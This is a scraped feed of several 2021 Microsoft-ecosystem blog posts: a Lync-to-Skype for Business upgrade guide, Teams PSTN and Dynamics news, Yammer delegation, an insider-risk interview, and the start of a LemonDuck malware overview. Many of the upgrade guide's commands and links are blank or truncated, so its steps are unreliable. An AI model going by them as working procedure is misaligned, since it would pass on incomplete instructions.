Category: Skype for Business

July 24th, 2021 by Eric Marsi

I recently performed an in-place upgrade from Lync Server 2013 to Skype for Business Server 2015 for a customer that is eventually moving to Teams. SFB Server was needed so that the customer can easily move users from within the SFB Server Control Panel. Below are some notes that I have on how to perform this process in 2021, in case you run into any issues like I did :)

In-Place Upgrades of Front-End Servers/Pools

Beginning the migration, I ensured that all Front-Ends had the latest Windows Updates installed and a reasonable amount of available disk space. I proceeded to install the management tools on a NON-SFB Server, ran topology builder, right-clicked the pool that we wanted to upgrade and clicked Upgrade to Skype for Business Server 2015, and then published topology. A few errors were presented about Monitoring Reports Databases on another box, but these can be ignored.

With these steps complete, the following commands were issued on all front-end server(s) in the pool.


I mounted the Skype for Business Server 2015 installation ISO, ran setup.exe and installed any needed updates. Unfortunately, I was presented with the error as shown below:

Before this server can be upgraded, the following must be resolved: KB 2982006, Patch for IIS ( 

Sounds simple, right? Install the update and call it a day! Unfortunately, that is not the case. Since the server has been updated on a regular basis, KB2982006 was included in other update rollups and was no longer defined. For this we need to perform a slightly modified version of the method from the guys over at UCLobby.

We need to first download the KB file below. If the Microsoft link stops working, please use my blog's mirror (the mirror copy is already in CAB form, so skip the next WinRAR step):

After downloading this, open the MSU file in WinRAR and extract the file named to the root of the C Drive (C:). Once in that directory, open PowerShell as an administrator and execute the following command:

.dism /Online /Add-Package /

Once that completes, press Y to reboot your computer. Upon restart, make sure that all Lync Server 2013 services are started before attempting a stop, or the services will keep trying to start. Open Lync Server Management Shell as an administrator and run the following commands:


At this point, we can launch the Skype for Business Server install wizard again, download updates, and look for the following screen:

Note: If you receive an error like the one below, make sure an updated copy of Topology was published from a non-Lync Server that includes the move to SFB 2015 noted above:

You cannot perform this upgrade until you have used Skype for Business Server 2015, Topology Builder to upgrade the Lync Server 2013 Pools and then publish the upgraded topology. If you have already published an updated topology those changes might not have replicated to this computer. You can force an immediate replication by running the Invoke-CsManagementStoreReplication cmdlet. You can also use the Export-CsConfiguration and Import-CsConfiguration -LocalStore cmdlets to copy the updated topology to this computer. For more information, see the appropriate cmdlet help topic.

The installer will request you reboot the server ~3 times. Upon each reboot, you will need to manually re-mount installation media and re-run setup.exe. At the end of the process you will see the following success screen:

Close the wizard and once again open SFB Server Management Shell as an administrator and run the following command:


Download the latest CU (UCMA Runtime and the Installer) from the link below (At the time of writing, this is CU11 HF4):

Run UcmaRuntime.msp and then SkypeServerUpdateInstaller.exe to update the server. The server will automatically reboot during this installation. Repeat for all servers in the pool (if Enterprise Edition) and, upon reboot, issue the following command to get services going:


Congratulations! You have migrated your FE Pool from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. Next we will talk about the requirements for the Edge Pool(s) and the Monitoring Reports Servers.

In-Place Upgrades of Edge Servers/Pools

Edge servers that ran Lync Server 2013 are a tad bit different and need a few other updates applied to them. The process I used is as follows:

I installed the .NET 3.5 Features using Server Manager and then ran the following command:


After stopping Lync services, an update from SQL Server 2012 Express to 2012 SP1 was needed as a minimum requirement for the upgrade to SFB Server 2015. This update can be downloaded from Microsoft or via my blog's mirror here:

Extract this to the root of your C Drive (C:) and then launch PowerShell as an Administrator. Run the following commands:

cd c:

The full SQL wizard will open and install the update. If you see it appear and disappear, reboot the machine and perform the start/stop of Lync Server services again. After the wizard installs this, reboot the server. Upon reboot, launch PowerShell as an administrator and run the following commands:

cd c:

After this is complete, reboot the server again and run the following commands:


We are now ready to upgrade the edge server to Skype for Business Server 2015! On the non-SFB management box, update the topology to state that you want to upgrade this edge to SFB 2015 and publish the topology.

At this point, we can launch the Skype for Business Server install wizard again, download updates, and look for the following screen:

The installer will request you reboot the server one time. After the reboot, you will need to manually re-mount the installation media and re-run setup.exe. At the end of the process you will see the following success screen:

Close the wizard and once again open SFB Server Management Shell as an administrator and run the following command:


Download the latest CU (UCMA Runtime and the Installer) from the link below (At the time of writing, this is CU11 HF4):

Run UcmaRuntime.msp and then SkypeServerUpdateInstaller.exe to update the server. The server will automatically reboot during this installation. Repeat for all servers in the pool (if Enterprise Edition) and, upon reboot, issue the following command to get services going:


Congratulations! You have migrated your Edge Pool from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. Next we will talk about the requirements for the Monitoring Reports Server(s).

In-Place Upgrades of Monitoring Reports Server(s)

For the Monitoring Reports server(s) we need to perform the following tasks:

Backup any custom reports from the SQL Server Report Server Management URL. If none exist, continue to the next step.

Mount the Skype for Business Server 2015 installation ISO, run setup.exe and install any needed updates. At this point we can click on the Deploy Monitoring Reports button on the right. Run this wizard as needed per your organization's requirements. This will replace all reports in the directory on the report server with the latest 2015 ones.

After this is complete, we are not off to the races just yet. The LCSCDR and QOEMetrics databases need to be updated to the new expected DB schema version. To do this, return to a Skype for Business 2015 Front-End and run the following command:

Install-CsDatabase -ConfiguredDatabases -SqlServerFqdn

After running this, we can run the following command to ensure that the installed and expected version match:

Test-CsDatabase -ConfiguredDatabases -SqlServerFqdn

NOTE: The above image is from my 2019 monitoring server, so the versions won't match those of a SQL box for SFB Server 2015.
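As an added example (not from the original post), the following script runs the Test-CsDatabase check for the monitoring databases and reports any database whose installed schema version does not match the expected one, so a partial Install-CsDatabase run does not go unnoticed. The SQL server FQDN is a placeholder, and the DatabaseName/ExpectedVersion/InstalledVersion property names are assumed from the cmdlet's default table output.

```powershell
# Added example, not part of the original post.
# Run from the Skype for Business Server Management Shell on an upgraded
# Front-End, after Install-CsDatabase -ConfiguredDatabases has completed.

# Placeholder: replace with the FQDN of your monitoring SQL server.
$SqlServerFqdn = 'monsql01.contoso.example'

# Assumption: each object returned by Test-CsDatabase exposes DatabaseName,
# ExpectedVersion and InstalledVersion (the columns of its default output).
$results = Test-CsDatabase -ConfiguredDatabases -SqlServerFqdn $SqlServerFqdn

# Only the CDR and QoE monitoring databases are of interest here.
# String comparison with -in is case-insensitive in PowerShell.
$monitoringDbs = $results | Where-Object {
    $_.DatabaseName -in @('LcsCDR', 'QoEMetrics')
}

if (-not $monitoringDbs) {
    Write-Warning "No LcsCDR/QoEMetrics databases reported on $SqlServerFqdn; check the FQDN and instance name."
    return
}

$mismatched = @()
foreach ($db in $monitoringDbs) {
    $expected  = [string]$db.ExpectedVersion
    $installed = [string]$db.InstalledVersion

    if ($expected -eq $installed) {
        Write-Host ("{0}: OK (schema version {1})" -f $db.DatabaseName, $installed)
    } else {
        Write-Warning ("{0}: installed {1}, expected {2}" -f $db.DatabaseName, $installed, $expected)
        $mismatched += $db
    }
}

if ($mismatched.Count -gt 0) {
    Write-Warning "Schema mismatch remains. Re-run: Install-CsDatabase -ConfiguredDatabases -SqlServerFqdn $SqlServerFqdn, then run this check again."
    exit 1
}
```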

Restore any custom reports to the Reporting Server reports directory.

Congratulations! You have migrated from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. If you have any questions, feel free to reach out to me or comment below! :)

Posted in Skype for Business

July 23rd, 2021 by Tom Arbuthnot


Previously Microsoft dealt with Microsoft provided PSTN number porting and number provision issues via some specific email addresses (like ptneu@microsoft and gcstnmsd@microsoft). As of July 22, 2021, the email system has been retired and replaced with a new dedicated portal.

The portal is at but can also be reached via the Teams Admin center:




Hopefully, this will make it easier to manage your PSTN cases with Microsoft, particularly since you can view your organisation’s cases in one place (“view my company cases”).

One gotcha is that only tenant accounts can raise cases for that tenant, so partners will need a tenant account for each tenant to manage this for their customers, but that isn’t a super unusual requirement for managed service partners.

Examples of cases you may raise include:

  • Custom Calling Name (US Only) – Set a custom calling name on your Microsoft phone numbers. This is applicable to United States phone numbers only.
    • Custom calling name to set (15 chars only) – The custom calling name that you want to set. The name has a maximum limit of 15 characters.
    • List of phone numbers – The list of phone numbers for which you want to set a custom calling name value. Upload a CSV file with the list of phone numbers.
  • Inter tenant port – Move phone numbers from one tenant to another. For example, you have two different tenants within Microsoft, and you want to move your phone numbers from one tenant to the other.
    • Source tenant domain name – The tenant from which you want to move phone numbers to a different tenant.
    • Source tenant unique identifier – The tenant ID for the source tenant. This is an optional field.
    • Destination tenant domain name – The tenant to which you want to move phone numbers.
    • Destination tenant unique identifier – The tenant ID for the destination tenant. This is an optional field.
    • Requested Date time* – The date and time on which you want your numbers moved from the source tenant to the destination tenant. See Date and time.
    • List of phone numbers – The list of phone numbers that you want to move from the source tenant to the destination tenant. Upload a csv file with the list of phone numbers.
  • Inventory Type Change – Change the type of phone number(s). For example, you want to change your Microsoft subscriber numbers to service numbers. For more information about the types of phone numbers Microsoft supports, see Types of phone numbers.
    • Convert to – Select to convert your numbers to user numbers or to service numbers.
    • Preferred Datetime* – The date and time on which you want the inventory type of your numbers to be changed. See Date and time for more information.

      *Date and Time. If you select Country = France, date = 8/14/2021 and time = 10am, then the request will be executed on 8/14/2021 at 10 a.m. French time.

    • Checkbox – I understand that to be able to update the inventory type, my phone numbers need to be unassigned – Microsoft cannot process phone number type change requests unless the phone numbers within your tenant are not assigned. If you are requesting this change for a future date, then you will need to ensure that the numbers are unassigned before your requested date and time.
    • List of phone numbers – The list of phone numbers whose type you want to change. Upload a CSV file with the list of phone numbers.
  • New TN Acquisition – Purchase new phone numbers from Microsoft.
    • Number Type – Select the type for your numbers. See Types of phone numbers.
    • Tried to get phone numbers from the Teams Admin Center Portal – Have you tried purchasing these phone numbers from the Microsoft Teams Admin Center portal, where you can self-serve?
    • Quantity of phone numbers required – The count of phone numbers that you want to purchase.
    • State/Province – The state/province within your country/region for which you want phone numbers.
    • City – The city within the state/province for which you want phone numbers.
    • Office address – This is specific to certain countries only. This is the site address of your office.
    • Directory listing – This is specific to certain countries only. Do you want to publish your company information with the phone numbers?
  • Port in – Port existing phone numbers from your current service provider to Microsoft.
    • Name your port order – Provide an easy-to-remember name for your port request.
    • Requested porting date/time* – The date and time on which you want the numbers to port to Microsoft. Please note that this is not a guaranteed porting date, since the current number owner has to approve our port request first. See Date and time.
    • List of porting numbers – The list of phone numbers that you would like to port to Microsoft. Upload a CSV file with the list of phone numbers.
    • Letter of authorization (LOA) – Attach a signed and filled out LOA here. Microsoft cannot process a port request without an LOA.
  • Address Update – Update emergency calling address. Note that this field applies to select countries only.
    • Location id – The location ID for your emergency address.
    • List of phone numbers – The list of phone numbers for which you want to change the emergency address (enter your desired address in the Description field). Upload a CSV file with the list of phone numbers.


Microsoft docs PSTN Service Desk


July 23rd, 2021 by Tom Arbuthnot

One good session from Inspire 2021 was on partners growing their Teams practice and the opportunity around Teams Phone.

It included a Teams Calling roadmap update.


Image from The Year of Teams Phone – Grow Your Practice

Most of this was already known about, but something public for the first time is “Client SDK to support ISV attendant console solutions”.

This is something the Teams space has really been waiting on. It’s a heavily upvoted item on User Voice.

What is an SDK? SDK stands for Software Development Kit, it means a set of code and tools to allow you to, in this case, make a client-side app or control a client.

I wonder if this client SDK will somehow relate to the new Teams 2.0/Webview2 work.

Either way, this is great news for the Microsoft Teams Ecosystem. I’m talking to a few attendant console providers to get their insights and will update the blog when I hear more.

Stay tuned to the blog for updates.


July 23rd, 2021 by Tom Arbuthnot

One of the big announcements from Microsoft Inspire last week was the integration between Microsoft Teams and Microsoft Dynamics 365, Microsoft’s enterprise resource planning (ERP) and customer relationship management (CRM) platform.

Microsoft is “launching” the same news multiple times these days, as it was also announced at Ignite, the customer conference in March 2021. Tom Morgan did a good overview at the time here.

Microsoft made a big deal about there being no cost for this integration. Being that they are both Microsoft products, to be honest I wouldn’t have assumed there would be a cost.

What does the Dynamics 365 and Microsoft Teams Integration allow you to do?

  • Automated notifications of Dynamics 365 events into Microsoft Teams
  • Adaptive card notifications allow for buttons and input, to allow connected workflows
  • View and collaborate on Dynamics 365 customer records right within a Teams chat or channel
  • Dynamics 365 users can now add a Teams meeting when creating an appointment
  • Enable access to key customer information during a Teams call
  • Capture notes directly with the Teams call, which are saved in the timeline of the Dynamics 365 record

Microsoft has also shown previously how they intend to allow integration between Teams Webinars and Dynamics 365 marketing

Example of the Dynamics 365 meetings app, with records details and notes


Example of an adaptive card notification from Dynamics 365 into Microsoft Teams


It looks like the connectors to push adaptive cards into Teams and surface records in Tabs in teams are available, but I can’t see the Teams meeting app yet.

What was missing from this announcement, which was shown in March 2021 was the ability to make a Teams call directly from within Dynamics 365. Hopefully, that is still coming.

Modality is a Teams and Dynamics 365 user, so I will update the blog when the calling or meetings app becomes available.


Install and set up Microsoft Teams integration

Bring Dynamics 365 into the flow of work with Teams—at no additional cost

From collaborative apps in Microsoft Teams to Windows 365—here’s what’s new in Microsoft 365 at Inspire


July 23rd, 2021 by M365 Now News Feed
Power Automate Desktop comes with new features in July 2021 release, including silent registration for machines, automatic detection of Windows proxy settings and more.


July 22nd, 2021 by Josh Leporati

Version 1.2 of our Champion Management Platform is now available! You can find out more information on the platform itself here and view the GitHub code here to get started on your upgrade or new install!

What's new?


Single site for all resources

We have addressed lots of feedback about security and permissions, as well as standardized all the platform assets into one SharePoint site (ChampionManagementPlatform). Now after you complete the first run experience, all lists will be located in this one site instead of across multiple locations! This should help simplify access and permissions when enabling your organization to access the resources for the Champion Management Platform.

Manage Champion approvals directly from the app

Champion managers will notice a new option to manage approvals directly from the app homepage. From here, you can easily approve or reject new nominations for the program. You can still visit the MemberList to change the status of the champion from pending to approved.



New fields in the Event Track List

When Champions log their events through the Leader Board, Champion managers will also see the Champion Name and Event Name listed out in the Event Track List. This should help in reporting and quickly identifying and sorting events based on the actual name and event type when looking through the data.



We hope you take an opportunity to explore this update and continue to let us know your thoughts and ideas on what you would like to see us improve on this solution! The Champion community is one close to our hearts and thanks for everything you continue to do!




July 22nd, 2021 by Lauren Goodwin

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files contain confidential information and form their core intellectual property (IP).

Loss of such proprietary information to an outsider or a competitor can have disastrous effects leading to a loss in sales, market share, and reduced profit margins. However, such industries often collaborate with other design partners or vendors or they share their design parts with smaller manufacturers. Product blueprints and designs are regularly exchanged, both within and outside the organization’s network boundaries. In such cases, there is a high possibility of a data leak.

Data loss or theft can occur in any one of the following ways:

  1. Every time you send a file to another person, a copy is usually made and stored online. Once the file leaves the organization there is no guarantee that it is safe unless it is adequately protected.
  2. Storing and transferring the file to another system.
  3. A malicious insider may have a copy of the file and the ability to share the information with an outsider, even after leaving the organization.

Microsoft Information Protection works where perimeter security fails

Organizations may use encryption programs, secure file transfer protocol, and other access control methods to prevent data leaks and data theft. However, once these files leave their original repository it is very difficult to keep track of their usage.

To solve this problem, organizations have invested in Microsoft Information Protection (MIP) an intelligent, unified, and extensible solution to protect sensitive data across your enterprise—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. MIP provides a unified set of capabilities to know your data, protect your data, and help prevent data loss across Microsoft 365 apps (such as Word, PowerPoint, Excel, and Outlook) and services (such as Teams, SharePoint, and Exchange).

Microsoft Information Protection capabilities.

When you have already invested in an excellent information protection system, it isn’t a prudent decision to go in for another information protection system. But what can be done to solve the above problem?

MIP and HALOCAD for secured digital collaboration at a global scale

SECUDE has integrated their HALOCAD solution with Microsoft’s MIP SDK which extends the data protection beyond the organization’s IT perimeter. HALOCAD not only integrates as a MIP SDK add-in into the content authoring environment but also works as an add-on into the content repository and implements information protection policies across supported repositories.

HALOCAD solution architectural diagram 1

With over two decades of experience in the data security field, SECUDE has a track record of adding value to the MIP capabilities to SAP environments, especially when exporting sensitive information from SAP environments. HALOCAD helps to seamlessly leverage MIP labeling templates for CAD files and does so simply and cost-effectively. It also applies the label to the content repository where the engineering processes for storing and sharing CAD files are kept.

Let us look at a hypothetical scenario on how data collaboration happens between the engineering team and the external third party vendors and suppliers with HALOCAD and MIP:

HALOCAD solution architectural diagram 2

In the above scenario, the design files move seamlessly across the supply chain with MIP sensitivity labels applied automatically and user privileges as defined by the organization.

Scenario 1 (Designer):

The user is the designer who owns the design files. Based on the user privilege defined, the designer can view, edit, copy, print, and export the files

Scenario 2 (Engineer):

The user is an engineer who consumes the design file shared with them by the engineering team. The engineer can view and edit the files. They can make modifications to the original file and share it. They do not have the privilege to copy, print, export, and use the snipping tool to make a copy.

Scenario 3 (Partner who has SECUDE solution):

In a typical manufacturing environment, the CAD drawings are shared with a lot of third-party partners and vendors across the supply chain for day-to-day operations. In this scenario, the partner who has purchased the SECUDE solution can only view the CAD files per the set privilege enforcement.

Scenario 4 (Unauthorized user):

If an unauthorized user outside of the organization tries to open the CAD drawings, the files are encrypted, and he will not be able to open the file.

Benefits of SECUDE’s HALOCAD

  1. HALOCAD extends the security templates provided by MIP to sensitive CAD files throughout the design lifecycle.
  2. HALOCAD applies sensitivity labels automatically during the check-out process without user engagement.
  3. HALOCAD preserves the extension of the file, allowing users to not see the difference and the workflow is not disrupted.
  4. If an unauthorized user using an AutoCAD application without the HALOCAD extension tries to open a document, they will not be able to open the file even though the extension is *.dwg.
  5. HALOCAD currently supports the following CAD applications:
    • Autodesk Inventor and AutoCAD
    • PTC Creo
    • Siemens NX and Solid Edge
  6. HALOCAD also supports the following PLM applications:
    • PTC Windchill
    • Siemens Teamcenter

For more information about the HALOCAD solution, please visit the SECUDE HALOCAD website. You can also find HALOCAD in Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


The post How to protect your CAD data files with MIP and HALOCAD appeared first on Microsoft Security Blog.


July 22nd, 2021 by fernandomartinezovelar

We’re excited to announce that users can now post on behalf of another user in Yammer. Once approval is granted, internal communicators can use this feature to share news and updates as well as reply to comments on behalf of leaders and their teams. This is not limited to Yammer admins - any user can choose to delegate access to any other person within the network by following the steps below. 




Setting up your delegate  


There are two types of delegate roles. The first type is the Delegate Manager. A delegate manager can post on behalf of the other user. They can also add or remove other delegates on behalf of the other user. The second type is the Delegate. Delegates can post on behalf of the other user, but they cannot add or remove other delegates on behalf of the other user. 


Any Yammer user can add another user from the same Yammer network as their delegate or delegate manager. Any message posted by a delegate or delegate manager will trigger a notification for the user who will appear as the author of the post. All other delegates that belong to that user’s delegate team will also get the notification.  



Note: This information will also be displayed in the e-Discovery records and will be viewable by admins. 


How to add a delegate: 


  1. Click on the Settings icon on the top right corner of 
  2. Click on Manage delegate settings
  3. Add the name of the person who will be the delegate or delegate manager. 
  4. Choose the type of delegate. 
  5. The delegate can now start posting on behalf of the user in any public or private Yammer community as long as both the delegate and the user have access to it. 




As soon as a user gets a new delegate assigned to the delegate team, that individual as well as the whole team of delegates will receive an email notifying them of this action. Subsequently, when a delegate is removed, that same audience is notified via email. When a delegate posts, the user will be notified that a post was made on their behalf.


What can a delegate do on behalf of their delegate user? 


  • Start a new conversation, announcement, poll, question in Yammer communities where both users have access 
  • Edit a message 
  • Post a comment  
  • Delete a message 
  • Post, edit, reply in Outlook, SharePoint and Microsoft Teams 
  • Add or remove other delegates, if designated a delegate manager 
  • View notifications of the responses, replies to the original post 



What cannot be done as a delegate? 


  • View analytics on a conversation 
  • Post private messages  
  • React to a conversation  


Recommendations for working with leaders 


We know from experience that leadership engagement is a key to success in Yammer networks. We are making it as frictionless as possible for leaders to start conversations. As Yammer encourages two-way conversations, we believe that even messages posted on your behalf should still be authentic discussions. 


If your senior leaders are hesitant to use Yammer, this could be a great way to start adding Yammer to their communication channels. Need more resources to support your conversation with leaders? Check out our Leadership Engagement deep dive to get started.   

From our experience, helping your leaders understand what Yammer is and how the conversations and connections can benefit them, creates the foundation of the importance of communities in your organization. As leaders start to participate more actively, their interaction with Yammer may continue to evolve.


Here’s a few guidelines for getting your leaders started with Yammer:  


Step 1 – Make sure your leader has an active Yammer account, including a profile picture. Ensure that your leader has joined a few relevant communities. Show them their peers and examples of good, better, best types of conversations to get their interests piqued.  


Step 2 – Brainstorm with your leader and communications team to figure out a plan for posting and replying that involves a variety of ways to participate. Build out a simple communications rhythm for your leader and community. Does your leader need to post weekly? Or is this interaction part of a larger campaign that they are spearheading? The level of interaction from your leader can help shape their engagement plan.  


Step 3 – Work on the actual content and messaging together. Understanding that the message needs to be authentic…how is this different than other channels they can use to communicate? Can your leader record a video to share their message and the delegate can post it on behalf of them? Or can the leader share a few bullet points of the message needed and the delegate can work on the tone, formatting and grammar? 


Step 4 – Post! Be sure to set expectations for replies and follow-up questions to the leader's conversations. 


Note: At this time, users cannot react on behalf of someone else.


How do you see leaders at your organization using Yammer? 



Frequently Asked Questions 


Can we determine if someone posted on behalf of someone else? 


If User A posts on behalf of User B, then User B gets a notification. The Yammer network admins can use the e-Discovery portal to see who posted on behalf of someone else. Within the Yammer feeds and conversations, there won’t be any signal indicating that the message was posted by a different user.  



How many delegates can a user add? 


You can add up to 20 delegates. 



If User A removes User B as her or his delegate, then what happens to all the previous posts made by User B on behalf of User A? 


No changes will happen. All messages posted by User B on behalf of User A will continue to exist. These messages will continue to be shown as posted by User A.  



Can the delegate post private messages or messages in private Yammer communities on behalf of someone else? 


The delegate can only post in Yammer communities where both users have access. Delegates cannot post Yammer private messages on behalf of someone else. 



Can User A post an announcement on behalf of User B? 


Yes, if the delegate is an admin in the Yammer community, she or he can post the message as an announcement. 




Stay in touch for more updates and what's coming next with Yammer on the blog. 


Fernando Martinez Ovelar, Sr Product Marketing Manager, Microsoft 




July 22nd, 2021 by Emma Jones

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Rockwell Automation Vice President and Chief Information Security Officer Dawn Cappelli. In this blog post, Dawn talks about the importance of including insider risk in your cybersecurity plan. 

Natalia: What is the biggest barrier that organizations face in addressing insider risk?

Dawn: The biggest barrier is drawing attention to insider risk. We heard about the ransomware group bringing down the Colonial Pipeline. We hear about ransomware attacks exposing organizations’ intellectual property (IP). We’re not hearing a lot about insider threats. We haven’t had a big insider threat case since Edward Snowden so that sometimes makes it hard to get buy-in for an insider risk program. But I guarantee insider threats are happening. Intellectual property is being stolen and systems are being sabotaged. The question is whether they are being detected—are companies looking?

Natalia: How do you assess the success of an insider risk program?

Dawn: First, we measure our success by significant cases. For instance, we have someone leaving the company to go to a competitor, we catch them copying confidential information that they clearly want to take with them, and we get it back.

Second, we measure success by looking at the team’s productivity. Everyone in the company has a risk score based on suspicious or anomalous activity as well as contextual data, for instance, they are leaving the company. Every day we start at the top of the dashboard with the highest risk and work our way down. We look at how many cases have no findings because that means we’re wasting time, and we need to adjust our risk models to eliminate false positives.

We also look at the reduction in cases because we focus a lot on deterrence, communication, and awareness, as well as cases by business unit and by region. We run targeted campaigns and training for specific business units or types of employees, regions, or countries, and then look at whether those were effective in reducing the number of cases.

Natalia: How does measuring internal threats differ from measuring external threats?

Dawn: From an external risk perspective, you need to do the same thing—see if your external controls are working and if they’re blocking significant threats. Our Computer Security Incident Response Team (CSIRT) also looks at the time to contain and the time to remediate. We should also measure how long it takes to respond to and recover IP taken by insiders.

By the way, I like using the term “insider risk” instead of “insider threat” because we find that most suspicious insider activity we detect and respond to is not intentionally malicious. Especially during COVID-19, we see more employees who are concerned about backing up their computer, so they pull out their personal hard drive and use it to make a backup. They don’t have malicious intent, but we still must remediate the risk. Next week they could be recruited by a competitor, and we can’t take the chance that they happen to have a copy of our confidential information on a removable media device or in personal cloud storage.

Natalia: How do you balance protecting against external threats and managing insider risks?

Dawn: You need to consider both. You should be doing threat modeling for external threats and insider risks and prioritizing your security controls accordingly. An insider can do anything an external attacker can do. There was a case in the media recently where someone tried to bribe an insider to plug in an infected USB drive to get malware onto the company’s network or open an infected attachment in an email to spread the malware. An external attacker can get in and do what they want to do much more easily through an insider.

We use the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) for our security program, and we use it to design a holistic security program that encompasses both external and insider security risks. For example, we identify our critical assets and who should have access to them, including insiders and third parties. We protect those assets from unauthorized access—including insiders and outsiders. We detect anomalous or suspicious behavior from insiders and outsiders. We respond to all incidents and recover when necessary. We have different processes, teams, and technologies for our insider risk program, but we also use many of the same tools as the CSIRT, like our Security Information and Event Management (SIEM) and Microsoft Office 365 tools.

Natalia: What best practices would you recommend for data governance and information protection?

Dawn: Don’t think about insider threats only from an IP perspective. There’s also the threat of insider cyber sabotage, which means you need to detect and respond to activities like insiders downloading hacking tools or sabotaging your product source code.

Think about it: an external attacker has to get into the network, figure out where the development environment is, get the access they need to compromise the source code or development environment, plant the malicious code or backdoor into the product—all without being detected. It would be a lot easier for an insider to do that because they know where the development environment is, they have access to it, and they know how the development processes work.

When considering threat types, I wouldn’t say that you need to focus more on cyber sabotage than IP; you need to focus on them equally. The mitigations and detections are different for IP theft versus sabotage. For theft of IP, we’re not looking for people trying to download malware, but for sabotage, we are. The response processes are also different depending on the threat vector.

Natalia: Who needs to be involved in managing and reducing insider risk, and how?

Dawn: You need an owner for your insider risk program, and in my opinion, that should be the Chief Information Security Officer (CISO). HR is a key member of the virtual insider risk team because happy people don’t typically commit sabotage; it’s employees who are angry and upset, and they tend to come to the attention of HR. Every person in Rockwell HR takes mandatory insider risk training every year, so they know the behaviors to look for.

Legal is another critical member of the team. We can’t randomly take people’s computers and do forensics for no good reason, especially in light of all the privacy regulations around the world. The insider risk investigations team is in our legal department and works with legal, HR, and managers. For any case involving personal information and any case in Europe, we go to our Chief Privacy Officer and make sure that we’re adhering to all the privacy laws. In some countries, we also have to go to the Works Council and let them know we’re investigating an employee. The security team is responsible for all the controls—preventive, detective—technology, and risk models.

Natalia: What’s next in the world of data regulation?

Dawn: Privacy is the biggest issue. The Works Councils in Europe are becoming stronger and more diligent. They are protecting the privacy of their fellow employees, and the privacy review processes make the deployment of monitoring technology more challenging.

In the current cyber threat environment, we must figure out how to get security and privacy to work together. My advice to companies operating in Europe is to go to the Works Councils as soon as you’re thinking about purchasing new technology. Make them part of the process and be totally transparent with them. Don’t wait until you’re ready to deploy.

Natalia: How will advancements like cloud computing and AI change the risk landscape?

Dawn: We have a cloud environment, and our employees are using it to develop products. From inception, the insider risk team worked to ensure that we’re always threat modeling the environment. We go through the entire NIST CSF for that cloud environment and look at it from both an external and insider risk perspective.

Companies use empirical, objective data to create and train AI models for their products. The question becomes, “Do you have controls to identify an insider who deliberately wants to bias your models or put something malicious into your AI models to make it go off course later?” With any type of threat, ask if an insider could facilitate this type of attack. An insider can do anything an outsider can do, and they can do it much more easily.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to balancing external threats and insider risk appeared first on Microsoft Security Blog.

Posted in Skype for Business

July 22nd, 2021 by Eric Avena

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as an entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

